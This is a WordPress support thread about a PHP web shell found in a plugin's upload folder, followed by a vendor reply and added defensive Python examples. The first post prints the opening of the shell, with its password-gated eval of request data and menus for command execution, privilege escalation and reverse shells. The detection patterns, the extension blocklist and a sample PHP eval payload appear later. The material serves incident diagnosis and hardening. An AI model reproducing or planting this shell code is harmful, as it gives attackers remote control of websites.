Title: WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen
Last modified: November 10, 2020

---

# WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen

 *  Resolved [jh](https://wordpress.org/support/users/jethrohazelhurst/)
 * (@jethrohazelhurst)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/)
 * Windows Defender discovered a threat while I was extracting a WordPress backup
   of my live site onto my localhost.
 * The warning is Exploit:JS/ShellCode.gen.
 * So I had a closer look at that file caches_data_thumb.php.
 * This is inside the directory “ppom_files”. Putting PPOM into Google shows this
   was a plugin which was installed a while back to add extra options for WooCommerce
   products. This plugin was removed a while ago, shortly after it was installed;
   however, the directories are still here.
 * I opened caches_data_thumb.php in my editor and it’s got some dodgy code in it
   with Chinese characters, see below:
 *     ```
       <?php
       header("Content-type:text/html;charset=gbk");
       $password='wp_caches';
       $shellname='Hello By xxxx';
       $myurl=null;
       error_reporting(0);
       ob_start();
       define('myaddress',$_SERVER['SCRIPT_FILENAME']);
       define('postpass',$password);
       define('shellname',$shellname);
       define('myurl',$myurl);
       if(@get_magic_quotes_gpc()){
           foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
           foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
       }
       if(isset($_REQUEST[postpass])){
       hmlogin(2);
       @eval($_REQUEST[postpass]);
       exit;}
       if($_COOKIE['postpass'] != md5(postpass)){
           if($_POST['postpass']){
               if($_POST['postpass'] == postpass){
                   setcookie('postpass',md5($_POST['postpass']));
                   hmlogin();
               }else{
                   echo '<CENTER>用户或密码错误</CENTER>';
               }
           }
           islogin($shellname,$myurl);
           exit;
       }
       if(isset($_GET['down'])) do_down($_GET['down']);
       if(isset($_GET['pack'])){
           $dir = do_show($_GET['pack']);
           $zip = new eanver($dir);
           $out = $zip->out;
           do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
       }
       if(isset($_GET['unzip'])){
           css_main();
           start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
           exit;
       }
       define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
       define('run_win',substr(PHP_OS, 0, 3) == "WIN");
       define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
       $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
       $doing = isset($_POST['doing']) ? $_POST['doing'] : "";
       $path = isset($_GET['path']) ? $_GET['path'] : root_dir;
       $name = isset($_POST['name']) ? $_POST['name'] : "";
       $img = isset($_GET['img']) ? $_GET['img'] : "";
       $p = isset($_GET['p']) ? $_GET['p'] : "";
       $pp = urlencode(dirname($p));
       if($img) css_img($img);
       if($eanver == "phpinfo") die(phpinfo());
       if($eanver == 'logout'){
           setcookie('postpass',null);
           die('<meta http-equiv="refresh" content="0;URL=?">');
       }
       $class = array(
       "信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
       "提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
       "批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文
   
       etc etc, goes on for 100s of lines...
       ```
   
 * Inside that directory there is other code too. An index.html with HTML for a
   landing page for a roof replacement company!
 * This leads me to believe this plugin has added, or allowed the upload of, malicious
   code.
 * Now my question is why has this happened? And how do I vouch for the integrity
   of my WooCommerce site and clean up this mess? And who’s to say there isn’t more
   of this garbage hiding out in sub-folders of sub-folders!
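A defender's first pass at the last question in the post, as an added example that is not code from this thread or from the PPOM plugin: a Python scanner that walks an extracted backup, flags PHP files sitting under upload directories, and searches file contents for the indicators visible in the shell above. The directory names, extension list, regexes and the sample tree it builds are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled web server will typically execute (constructed list for this example).
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}
# Directories that should only hold uploaded data, never code: "ppom_files" from the post, "uploads" = wp-content/uploads.
DATA_DIRS = {"uploads", "ppom_files"}
# Content indicators modelled on the shell shown above; constructed regexes, not a vendor signature.
SHELL_PATTERNS = {
    "eval-of-request-data": re.compile(rb"@?eval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b"),
    "shell-banner-variable": re.compile(rb"\$shellname\s*="),
    "magic-quotes-probe": re.compile(rb"get_magic_quotes_gpc\s*\("),
}

def scan_backup(root):
    """Return {relative_posix_path: [reasons]} for files that look like planted PHP."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        reasons = []
        # Look at every dotted suffix, not only the last one, so "x.php.jpg" is still flagged.
        has_php_ext = any(s.lower() in PHP_EXTS for s in path.suffixes)
        if has_php_ext and any(part in DATA_DIRS for part in rel.parts[:-1]):
            reasons.append("php-file-in-upload-dir")
        data = path.read_bytes()
        reasons += [name for name, pat in SHELL_PATTERNS.items() if pat.search(data)]
        if reasons:
            findings[rel.as_posix()] = reasons
    return findings

def build_sample_backup():
    """Write a constructed mini backup tree into a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="wpbackup_"))
    ppom = root / "wp-content" / "uploads" / "ppom_files"
    plugin = root / "wp-content" / "plugins" / "demo"
    ppom.mkdir(parents=True)
    plugin.mkdir(parents=True)
    # Trimmed-down stand-in for the file the post describes (constructed, not the real file).
    (ppom / "caches_data_thumb.php").write_bytes(
        b"<?php $password='wp_caches'; $shellname='Hello By xxxx';\n"
        b"if(isset($_REQUEST[postpass])){ @eval($_REQUEST[postpass]); exit;}\n")
    (ppom / "index.html").write_bytes(b"<html>roofing company landing page</html>")
    (root / "wp-content" / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed jpeg")
    (plugin / "demo.php").write_bytes(b"<?php echo 'legitimate plugin code';")
    return root
```

Running `scan_backup(build_sample_backup())` reports only the planted file; the plugin's own .php file outside the data directories and the real image are left alone.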

Viewing 5 replies - 1 through 5 (of 5 total)

 *  [N-Media](https://wordpress.org/support/users/nmedia/)
 * (@nmedia)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13648987)
 * Hi,
 * It seems you allowed file upload and didn’t set the file types properly; you
   must deny the .PHP types and only accept the files you really need.
 * You should remove ppom_files entirely and then set the file types from File Input.
 *  [terrafire123](https://wordpress.org/support/users/terrafire123/)
 * (@terrafire123)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13652640)
 * Sorry, but why doesn’t the plugin prevent PHP and HTML file upload? This seems
   like an extremely basic security precaution that users can’t and shouldn’t be
   expected to manage.
 * There are many, many extremely inexperienced webdevs, who, unlike OP, if in a
   similar situation would never be able to resolve this.
 *  [N-Media](https://wordpress.org/support/users/nmedia/)
 * (@nmedia)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13653881)
 * Hi,
 * Yes, our plugin already has this check to stop uploading PHP and HTML files; here
   I have even added the PHP file as an allowed file type: [https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing](https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing)
 * But on the front end, our plugin refuses to accept it if someone tries to upload these
   files:
    [https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo](https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo)
 *  [terrafire123](https://wordpress.org/support/users/terrafire123/)
 * (@terrafire123)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13654168)
 * > Hi,
   > Yes, our plugin already has this check to stop uploading PHP and HTML files;
   > here I have even added the PHP file as an allowed file type: [https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing](https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing)
   > But on the front end, our plugin refuses to accept it if someone tries to upload these
   > files:
   >  [https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo](https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo)
 * …But if the server denies uploading of PHP files, then how can any of OP’s mistakes
   have caused the issue?
 * Front-end validation is, of course, NEVER enough, because the browser can’t ever
   be trusted…
 *  [N-Media](https://wordpress.org/support/users/nmedia/)
 * (@nmedia)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13659497)
 * Yes, we know the front-end validation is not enough; we have added this on the
   server side. You can see it inside inc/files.php near line 159, like this:
 *     ```
       // $file_type is the uploaded file's extension, as determined by the surrounding plugin code.
       $bad_types = array('php','php4','php5','php6','php7','phtml','exe');

       if( in_array( strtolower($file_type), $bad_types) ){
           $response ['status'] = 'error';
           $response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' );
           wp_send_json( $response );
       }
       ```
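An added example, not the plugin's code, contrasting the blocklist check quoted above (re-expressed in Python) with an allowlist check that considers every dotted segment of the name and the file's leading bytes rather than only the last extension. The allowlist, the magic-byte table and the sample upload attempts are assumptions constructed for this example.

```python
# Extension blocklist as written in the plugin snippet above (inc/files.php).
BAD_TYPES = {"php", "php4", "php5", "php6", "php7", "phtml", "exe"}
# What a product-options upload field might actually need; constructed allowlist for this example.
ALLOWED_TYPES = {"jpg", "jpeg", "png", "gif", "pdf"}
# Leading bytes of each allowed type, so the content is checked as well as the name (constructed table).
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n",
         "gif": b"GIF8", "pdf": b"%PDF-"}

def blocklist_check(filename):
    """Python re-expression of the plugin's check: last extension only, compared to a blocklist."""
    file_type = filename.rsplit(".", 1)[1] if "." in filename else ""
    return file_type.lower() not in BAD_TYPES

def allowlist_check(filename, data):
    """Hardened check: every dotted segment must be allowed and the bytes must match that type."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False                          # no extension, or a dotfile
    exts = [p.lower() for p in parts[1:]]
    if any(ext not in ALLOWED_TYPES for ext in exts):
        return False                          # any unexpected segment rejects the whole name
    return data.startswith(MAGIC[exts[-1]])   # declared type must match the content

# Constructed upload attempts: (filename, first bytes of the content).
SAMPLES = [
    ("photo.jpg", b"\xff\xd8\xff\xe0JFIF"),        # genuine image
    ("shell.PHP", b"<?php eval($_REQUEST['x']);"),  # upper-cased PHP extension
    ("notes.txt", b"plain text"),                   # harmless but not needed
    ("photo.jpg", b"<?php echo 1;"),                # image name, PHP content
    ("photo.php.jpg", b"\xff\xd8\xff\xe0JFIF"),    # extra dotted segment in the name
]

def compare(samples=SAMPLES):
    """Return [(filename, blocklist_verdict, allowlist_verdict)] for each sample."""
    return [(n, blocklist_check(n), allowlist_check(n, d)) for n, d in samples]
```

The blocklist accepts three of the five attempts that the allowlist rejects; only the first sample passes both.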
   


The topic ‘WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen’ is closed to new replies.
